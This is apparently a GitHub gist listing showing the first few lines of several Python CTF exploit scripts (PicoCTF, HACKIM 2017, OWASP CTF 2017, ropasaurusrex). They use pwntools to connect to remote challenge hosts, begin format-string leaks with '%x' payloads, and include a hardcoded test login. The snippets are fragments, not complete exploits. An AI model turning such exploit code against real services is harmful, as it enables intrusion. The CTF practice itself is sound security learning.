This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| print "hello Madafuckerz" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import requests | |
| import re | |
| wordlist = open("/home/crypthon/Downloads/list.txt","rb").readlines() #http://pastebin.com/SjjiH2ua | |
| for x in wordlist: | |
| p = x.replace('\n','') | |
| m = p.replace("\r","") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| import random | |
| while True: | |
| co = remote('104.236.216.251',64753) | |
| print co.recv() | |
| co.send('abdel\n') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Guess | format string | leaking | |
| #PicoCTF GUESS | |
| from pwn import * | |
| import time | |
| import re |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| ########STAGE1 GET OFFSET | |
| """ | |
| cnx = remote("172.16.20.132",2020) | |
| trash = "AAAA"+"-%x"*200 | |
| cnx.send(trash+"\n") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| con = remote("172.16.20.133",2020) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #ROPASAURUSREX - EXPLOIT | |
| #ABDELJALIL NOUIRI | |
| from time import * | |
| import sys | |
| from pwn import * |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #author : Abdeljalil Nouiri | |
| from pwn import * | |
| user = "charly" | |
| passwd = "h4ckTH1s" | |
| con = process("./flag") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from libformatstr import * | |
| #Exploit the daemon at 34.198.96.6:9001 | |
| #Exploitation Question 1 : 200 pts | |
| #HACKIM CTF2017 | |
| #exploit by : Abdeljalil Nouiri | |
| con = remote("34.198.96.6" , 9001) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #OWASPCTF 2017 | |
| #ultrababy exploit Code | |
| #Abdeljalil Nouiri | |
| from libformatstr import * | |
| from pwn import * | |
| import sys |
OlderNewer